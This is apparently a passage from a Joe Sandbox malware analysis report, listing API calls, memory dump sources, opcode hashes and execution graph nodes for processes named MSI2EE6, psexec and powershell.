                                                                          • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,5E20FB0F), ref: 00AD83C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ConvertFreeLocalString
                                                                          • String ID: Invalid SID
                                                                          • API String ID: 3201929900-130637731
                                                                          • Opcode ID: 39bf1edd7dfaf57647a1364df7afd3c253d10e86531eefe65de27eade0ce1f8d
                                                                          • Instruction ID: a49825ab534c3da3a5866316bfe672ce6fa0b370c6dd77d8236e1eeb9bcc4e21
                                                                          • Opcode Fuzzy Hash: 39bf1edd7dfaf57647a1364df7afd3c253d10e86531eefe65de27eade0ce1f8d
                                                                          • Instruction Fuzzy Hash: 4E218175A003059BDB14CF58C959BAFBBF8FF44B04F14465EE816A7380DBB9AA448BD0
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC4AB
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC50E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 3988782225-1405518554
                                                                          • Opcode ID: 995712f0eac6170b98bf182edeaedd6c65ac2192d3edb87152248b52ec7829bf
                                                                          • Instruction ID: 486a68f89a8cda4ec51645fe855696412a45b9c6e6983f1c19ffeef02d8a1eda
                                                                          • Opcode Fuzzy Hash: 995712f0eac6170b98bf182edeaedd6c65ac2192d3edb87152248b52ec7829bf
                                                                          • Instruction Fuzzy Hash: 6221C0708097C4EED721CF68C90478BBFF4AF25714F108A9ED49997B81D3B9A604CBA1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3_
                                                                          • String ID: false$true
                                                                          • API String ID: 2427045233-2658103896
                                                                          • Opcode ID: 98fdc2d39fdef340e5136fc64c3063b8de179c27966affe11ebb6f692159b056
                                                                          • Instruction ID: 3b9af8fa8e1259eb356bc1080008cfe376d6cf9295776bd3e6ce1eae8f2470a3
                                                                          • Opcode Fuzzy Hash: 98fdc2d39fdef340e5136fc64c3063b8de179c27966affe11ebb6f692159b056
                                                                          • Instruction Fuzzy Hash: C2112776901784AFC720EFB5D441B8ABBF4AF19300F00895AF1A5DB351EB70EA44CB50
                                                                          APIs
                                                                            • Part of subcall function 00AE10C0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,5E20FB0F,?,00B1A250,000000FF), ref: 00AE10E7
                                                                            • Part of subcall function 00AE10C0: GetLastError.KERNEL32(?,00000000,00000000,5E20FB0F,?,00B1A250,000000FF), ref: 00AE10F1
                                                                          • IsDebuggerPresent.KERNEL32(?,?,00B2DB48), ref: 00AE2478
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B2DB48), ref: 00AE2487
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AE2482
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 3511171328-631824599
                                                                          • Opcode ID: 0efc426f3327e315c6792e4cad7f712f27bfb3bb79f90893cf803702308ef91e
                                                                          • Instruction ID: f0ce6f0b7bee39909a453b81175cff226e50ad34e671954b89c94ab89f53210f
                                                                          • Opcode Fuzzy Hash: 0efc426f3327e315c6792e4cad7f712f27bfb3bb79f90893cf803702308ef91e
                                                                          • Instruction Fuzzy Hash: 2BE0E5742007928FD3249F29E50578676E8AF04744F40C96DE856D7651DFB4D5448B61
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,40000022,5E20FB0F,?,00000000,?,?,?,?,00B1AC40,000000FF,?,00AD650E,00000000,?), ref: 00AD6DD4
                                                                          • LocalAlloc.KERNEL32(00000040,3FFFFFFF,5E20FB0F,?,00000000,?,?,?,?,00B1AC40,000000FF,?,00AD650E,00000000,?), ref: 00AD6DF7
                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00B1AC40,000000FF,?,00AD650E,00000000), ref: 00AD6E97
                                                                          • LocalFree.KERNEL32(?,5E20FB0F,00000000,00B1A250,000000FF,?,00000000,00000000,00B1AC40,000000FF,5E20FB0F), ref: 00AD6F1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Local$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2012307162-0
                                                                          • Opcode ID: f7530437dd16f4f81afaa17075a7df2573ca7ebe0e2af0f922704e9043cb3de3
                                                                          • Instruction ID: d244efad82234fc8ac25f540d2704600ba89fddfbf3a9ffddc363770dce8eaa4
                                                                          • Opcode Fuzzy Hash: f7530437dd16f4f81afaa17075a7df2573ca7ebe0e2af0f922704e9043cb3de3
                                                                          • Instruction Fuzzy Hash: A651A7B5A002059FDB18CF68C985BAEFBB5FB08710F14462EE816E7380DB35AD50CB90
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,?,00000000,?), ref: 00AD4BA7
                                                                          • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,?,00000000,?), ref: 00AD4BC7
                                                                          • LocalFree.KERNEL32(7FFFFFFE,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00AD4C4D
                                                                          • LocalFree.KERNEL32(00000000,5E20FB0F,00000000,00000000,Function_0004A160,000000FF,?,?,00000000,?,?,00000000,?), ref: 00AD4CCD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Local$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2012307162-0
                                                                          • Opcode ID: cb148e3270c3b3fb014abcc45a42d410ea741a80d775844d2201c6beae5512ab
                                                                          • Instruction ID: ed8b0e3c3a8750b9ad723b28cc96cb1d9b7118a747fd8de025096fbf701b003d
                                                                          • Opcode Fuzzy Hash: cb148e3270c3b3fb014abcc45a42d410ea741a80d775844d2201c6beae5512ab
                                                                          • Instruction Fuzzy Hash: 7C51D472604215AFC715DF28DD81AAAB7E8EB49720F140A6FF866D7390DB30ED148B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4596721057.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd340b0000_psexec.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 987529b34ba0b0f07ceed3e4cb0a071174ad1084a157fc19b6c35033d81d9229
                                                                          • Instruction ID: a6c329b0ee129430611e0edcd6e14d21809911751897b97fbf4df7136acb7736
                                                                          • Opcode Fuzzy Hash: 987529b34ba0b0f07ceed3e4cb0a071174ad1084a157fc19b6c35033d81d9229
                                                                          • Instruction Fuzzy Hash: 93A1A231B1CA1A4FEBA5EB6884E56B973E2FF99305F500479D50EC3293DE68EC029740
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4596721057.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd340b0000_psexec.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee8fbaf75de54419923e7f3f95d781dd17940c7572e32e564444945b2a733702
                                                                          • Instruction ID: 005170a773a351ceec971cc5192998bd29569db5c2fc9297318974aeb90c6ee7
                                                                          • Opcode Fuzzy Hash: ee8fbaf75de54419923e7f3f95d781dd17940c7572e32e564444945b2a733702
                                                                          • Instruction Fuzzy Hash: C351D530A0D7C84FD757DB7898A56E93FE0EF47311F0441ABE489CB1A3CAA99805D752

                                                                          Execution Graph

                                                                          Execution Coverage:2.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:39
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 12954 7ffd340c80a9 12955 7ffd340c80af CoCreateInstance 12954->12955 12957 7ffd340c814b 12955->12957 12958 7ffd340cb509 12959 7ffd340cb50f IUnknown_QueryInterface_Proxy 12958->12959 12961 7ffd340cb5c8 12959->12961 12927 7ffd340c82fc 12928 7ffd340c8305 CoSetProxyBlanket 12927->12928 12930 7ffd340c83de 12928->12930 12962 7ffd340cc168 12963 7ffd340cc171 12962->12963 12964 7ffd340cc399 12963->12964 12966 7ffd340c4e50 12963->12966 12966->12963 12967 7ffd340cce10 12966->12967 12968 7ffd340c7e10 CoCreateInstance 12967->12968 12969 7ffd340cce68 12968->12969 12969->12963 12931 7ffd340c8bb4 12932 7ffd340c8bbd ObjectStublessClient3 12931->12932 12934 7ffd340c8c7a 12932->12934 12970 7ffd340caefd 12971 7ffd340caf03 ObjectStublessClient4 12970->12971 12973 7ffd340cafb8 12971->12973 12935 7ffd340c6b32 12936 7ffd340c6b3a 12935->12936 12937 7ffd340c75fc 12936->12937 12939 7ffd340c7443 12936->12939 12943 7ffd340c6c02 12936->12943 12938 7ffd340c4d98 CoCreateInstance 12937->12938 12937->12943 12938->12943 12939->12943 12944 7ffd340c4d98 12939->12944 12941 7ffd340c75c2 12942 7ffd340c4d98 CoCreateInstance 12941->12942 12941->12943 12942->12943 12944->12941 12945 7ffd340cbec0 12944->12945 12948 7ffd340c7e10 12945->12948 12947 7ffd340cbeff 12949 7ffd340c7e6b 12948->12949 12951 7ffd340c7e22 12948->12951 12949->12947 12950 7ffd340c7e2b 12950->12947 12951->12950 12952 7ffd340c80e4 CoCreateInstance 12951->12952 12953 7ffd340c814b 12952->12953 12953->12947

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 234 7ffd34187ba8-7ffd34187bac 235 7ffd34187bae-7ffd34187bcb 234->235 236 7ffd34187c26 234->236 240 7ffd34187bcd-7ffd34187be1 235->240 241 7ffd34187b79 235->241 238 7ffd34187c3f-7ffd34187c44 236->238 239 7ffd34187c28-7ffd34187c35 236->239 242 7ffd34187c4a-7ffd34187c4d 238->242 243 7ffd34187ce5-7ffd34187cef 238->243 239->238 253 7ffd34187c37-7ffd34187c3d 239->253 245 7ffd34187be3-7ffd34187be9 240->245 246 7ffd34187bfb 240->246 251 7ffd34187b7e-7ffd34187b99 241->251 252 7ffd34187b7b 241->252 247 7ffd34187c64-7ffd34187c68 242->247 248 7ffd34187c4f-7ffd34187c58 242->248 249 7ffd34187cf1-7ffd34187cff 243->249 250 7ffd34187d00-7ffd34187d42 243->250 259 7ffd34187c03-7ffd34187c16 245->259 260 7ffd34187beb-7ffd34187bf9 245->260 257 7ffd34187bfc-7ffd34187c02 246->257 247->243 261 7ffd34187c6a-7ffd34187c70 247->261 248->247 267 7ffd34187d45-7ffd34187db3 250->267 251->257 252->251 253->238 257->259 266 7ffd34187c1c-7ffd34187c24 259->266 259->267 260->246 264 7ffd34187c72-7ffd34187c7f 261->264 265 7ffd34187c8c-7ffd34187cae 261->265 264->265 273 7ffd34187c81-7ffd34187c8a 264->273 279 7ffd34187cb5-7ffd34187cbc 265->279 266->236 289 7ffd34187dde-7ffd34187de7 267->289 290 7ffd34187db5 267->290 273->265 281 7ffd34187cc2-7ffd34187cca 279->281 283 7ffd34187cd2-7ffd34187cd7 281->283 284 7ffd34187ccc-7ffd34187cd0 281->284 286 7ffd34187cd8-7ffd34187ce4 283->286 284->286 291 7ffd34187de9-7ffd34187ded 289->291 290->289 292 7ffd34187df1-7ffd34187e07 291->292 294 7ffd34187e0e-7ffd34187e1f 292->294 295 7ffd34187e09 292->295 297 7ffd34187e21 294->297 298 7ffd34187e26-7ffd34187e3b 294->298 295->294 296 7ffd34187e0b 295->296 296->294 297->298 299 7ffd34187e23 297->299 298->291 300 7ffd34187e3d-7ffd34187e43 298->300 299->298 300->292 301 7ffd34187e45-7ffd34187e70 300->301
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8l-4$8l-4
                                                                          • API String ID: 0-2225609699
                                                                          • Opcode ID: b7b17eea21af84aab9af000a61fd5d2ae0f2ba854a534753372d5993fb9acdcf
                                                                          • Instruction ID: 238e43d99f7dd24426ad4e5455dd360a44a70d72007db23eac3391353f7455ee
                                                                          • Opcode Fuzzy Hash: b7b17eea21af84aab9af000a61fd5d2ae0f2ba854a534753372d5993fb9acdcf
                                                                          • Instruction Fuzzy Hash: 61B10563A0DBDA4FE7A697285CA45B4BFE0DF57220B0901FBD199CB093DA1CAC06D351

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 56011fc241dd788aeb09cebe829168199d5991d2cf31d98bef747b1f13b8cece
                                                                          • Instruction ID: bde1264b631b622837d2d987e642149af5cb32aec6bbb9b76a5fe613991cd668
                                                                          • Opcode Fuzzy Hash: 56011fc241dd788aeb09cebe829168199d5991d2cf31d98bef747b1f13b8cece
                                                                          • Instruction Fuzzy Hash: 77A14A72B0CA498FE7A9D72C98593B97BD1EB9A311F04027FD04DC71D2DE686C429391

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 553 7ffd340c82fc-7ffd340c8303 554 7ffd340c8305-7ffd340c830d 553->554 555 7ffd340c830e-7ffd340c83dc CoSetProxyBlanket 553->555 554->555 558 7ffd340c83e4-7ffd340c840a 555->558 559 7ffd340c83de 555->559 559->558
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: fb312e6307dc23648f8946eb1e6127a3ca528c7bc0c497de44c52b85b366120c
                                                                          • Instruction ID: bc496b636ff4fe9046bdc932e6266d1ce2e99879acaf6023daac3721bb25bc04
                                                                          • Opcode Fuzzy Hash: fb312e6307dc23648f8946eb1e6127a3ca528c7bc0c497de44c52b85b366120c
                                                                          • Instruction Fuzzy Hash: 0541053190CB488FDB18DB5CD845AE97BF0FB6A321F14422FE049D3252C674A812CBC1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 561 7ffd340c8bb4-7ffd340c8bbb 562 7ffd340c8bc6-7ffd340c8c78 ObjectStublessClient3 561->562 563 7ffd340c8bbd-7ffd340c8bc5 561->563 565 7ffd340c8c7a 562->565 566 7ffd340c8c80-7ffd340c8c9d 562->566 563->562 565->566
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: Client3ObjectStubless
                                                                          • String ID:
                                                                          • API String ID: 3839999677-0
                                                                          • Opcode ID: 34a211016ca779bc202ba56cbc7051fa2928b942e199cbfeb09723c81eb83f49
                                                                          • Instruction ID: fc1291f7ec53d89d807eb787b5599c1a4ec4de2f8bdd1f9e1d0230148c1c2447
                                                                          • Opcode Fuzzy Hash: 34a211016ca779bc202ba56cbc7051fa2928b942e199cbfeb09723c81eb83f49
                                                                          • Instruction Fuzzy Hash: 2231F871A0CA4C8FDB1CDB5C984A6F97BE0FB9A321F10422FD049D3292DB746856CB91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 567 7ffd340cb509-7ffd340cb50d 568 7ffd340cb515 567->568 569 7ffd340cb50f 567->569 570 7ffd340cb517 568->570 571 7ffd340cb518-7ffd340cb529 568->571 569->568 570->571 572 7ffd340cb52b 571->572 573 7ffd340cb52c-7ffd340cb5c6 IUnknown_QueryInterface_Proxy 571->573 572->573 576 7ffd340cb5c8 573->576 577 7ffd340cb5ce-7ffd340cb5eb 573->577 576->577
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: Interface_ProxyQueryUnknown_
                                                                          • String ID:
                                                                          • API String ID: 2522245112-0
                                                                          • Opcode ID: 0ac1550215c89ddf218e0883f91c95c1d1c2f4880c8f62c89474ecbabad6b771
                                                                          • Instruction ID: 50eb417970476584bffc01c7c84633017ae2f1e089b00ac878ef800c218bb050
                                                                          • Opcode Fuzzy Hash: 0ac1550215c89ddf218e0883f91c95c1d1c2f4880c8f62c89474ecbabad6b771
                                                                          • Instruction Fuzzy Hash: 5B313F7161CB888FDB25AB6CAC4A6F67FF4DB57321F00417FE089C3152DA246846C782

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 578 7ffd340caefd-7ffd340caf01 579 7ffd340caf09 578->579 580 7ffd340caf03 578->580 581 7ffd340caf0b 579->581 582 7ffd340caf0c-7ffd340caf1d 579->582 580->579 581->582 583 7ffd340caf1f 582->583 584 7ffd340caf20-7ffd340cafb6 ObjectStublessClient4 582->584 583->584 587 7ffd340cafb8 584->587 588 7ffd340cafbe-7ffd340cafdb 584->588 587->588
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: Client4ObjectStubless
                                                                          • String ID:
                                                                          • API String ID: 2145431975-0
                                                                          • Opcode ID: 7e50cb7e7d8b30b087be808197f06e94dd3a59bd066edc0132ad0f7ebd3e50d9
                                                                          • Instruction ID: 9dae42f59213cf568a5a85cfd42225c9d67e999356c62bfe13469acf1ab5d916
                                                                          • Opcode Fuzzy Hash: 7e50cb7e7d8b30b087be808197f06e94dd3a59bd066edc0132ad0f7ebd3e50d9
                                                                          • Instruction Fuzzy Hash: 03314971A1CB888FD7159BAC9C5A6B67FF0DB57321F04416FD089C3193DA246816CB82

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 589 7ffd340c80a9-7ffd340c8149 CoCreateInstance 592 7ffd340c814b 589->592 593 7ffd340c8151-7ffd340c8177 589->593 592->593
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4670055327.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd340b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID:
                                                                          • API String ID: 542301482-0
                                                                          • Opcode ID: 58aeac6eb5b82cfb92d30d32197ffd64438c3cc4d52378d33bb9ea4f2aacfab1
                                                                          • Instruction ID: f6c26d300f95604ce4e00ec8b105801982418821b73233a1cd4ff809ae0e3f15
                                                                          • Opcode Fuzzy Hash: 58aeac6eb5b82cfb92d30d32197ffd64438c3cc4d52378d33bb9ea4f2aacfab1
                                                                          • Instruction Fuzzy Hash: CB31C331A0CA4C8FDB5CEB5C98466F977E5FB99321F10422FD049D3252CB70A8128B95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 595 7ffd34187c5c-7ffd34187c68 597 7ffd34187c6a-7ffd34187c70 595->597 598 7ffd34187ce5-7ffd34187cef 595->598 599 7ffd34187c72-7ffd34187c7f 597->599 600 7ffd34187c8c-7ffd34187cbc 597->600 601 7ffd34187cf1-7ffd34187cff 598->601 602 7ffd34187d00-7ffd34187db3 598->602 599->600 606 7ffd34187c81-7ffd34187c8a 599->606 614 7ffd34187cc2-7ffd34187cca 600->614 626 7ffd34187dde-7ffd34187de7 602->626 627 7ffd34187db5 602->627 606->600 615 7ffd34187cd2-7ffd34187cd7 614->615 616 7ffd34187ccc-7ffd34187cd0 614->616 618 7ffd34187cd8-7ffd34187ce4 615->618 616->618 628 7ffd34187de9-7ffd34187ded 626->628 627->626 629 7ffd34187df1-7ffd34187e07 628->629 631 7ffd34187e0e-7ffd34187e1f 629->631 632 7ffd34187e09 629->632 634 7ffd34187e21 631->634 635 7ffd34187e26-7ffd34187e3b 631->635 632->631 633 7ffd34187e0b 632->633 633->631 634->635 636 7ffd34187e23 634->636 635->628 637 7ffd34187e3d-7ffd34187e43 635->637 636->635 637->629 638 7ffd34187e45-7ffd34187e70 637->638
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8l-4
                                                                          • API String ID: 0-1418236748
                                                                          • Opcode ID: 6f12fbb3df36c6774bfb756b4998465c56165ddcb5eedab598e56eb3224bf4a7
                                                                          • Instruction ID: 729d3bb00da424b36410fa726f93f31618a933dd38d29baa7a9061bf616f3ae5
                                                                          • Opcode Fuzzy Hash: 6f12fbb3df36c6774bfb756b4998465c56165ddcb5eedab598e56eb3224bf4a7
                                                                          • Instruction Fuzzy Hash: 9511C433B0D9964FE7E1E72858E45747BD0EF66220B5900FAD16DD7196DA1CAC019341

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b94369d30bc8abc6b270338c5d971fb7d0507ec7aaf7ef7d0e353ddd22413fb
                                                                          • Instruction ID: 03467b28215c181b2c9dcf60f7c0fb058f72b84ab3fc081ccc724423ce8d4ee6
                                                                          • Opcode Fuzzy Hash: 0b94369d30bc8abc6b270338c5d971fb7d0507ec7aaf7ef7d0e353ddd22413fb
                                                                          • Instruction Fuzzy Hash: 1F51E723F0DE664FEBD9DB2C58A167477D1EF86220B5901BAD16EC7193DE18E8019381
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac24263462d2e56546cb7ada81f43e2496ce1106432468a625b4b4499b77ebfb
                                                                          • Instruction ID: 54fabe17dd1ba1e9de0e7164e6c2d6f20046203ccd7ccbbb04282375c995deae
                                                                          • Opcode Fuzzy Hash: ac24263462d2e56546cb7ada81f43e2496ce1106432468a625b4b4499b77ebfb
                                                                          • Instruction Fuzzy Hash: 2221E323F0DEA74FEBE5DB2C88A063476D1EF56220B5901BAD16EC35A2CE1CEC009341
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c272b7155fba3dfe542a1a684eb712a8354cb2914efc56970ad2dfd98cc6bf91
                                                                          • Instruction ID: a212b20f942ec2fa86e904e11a5d9c3ba5993c7248065bb6cd3ab157bf90c772
                                                                          • Opcode Fuzzy Hash: c272b7155fba3dfe542a1a684eb712a8354cb2914efc56970ad2dfd98cc6bf91
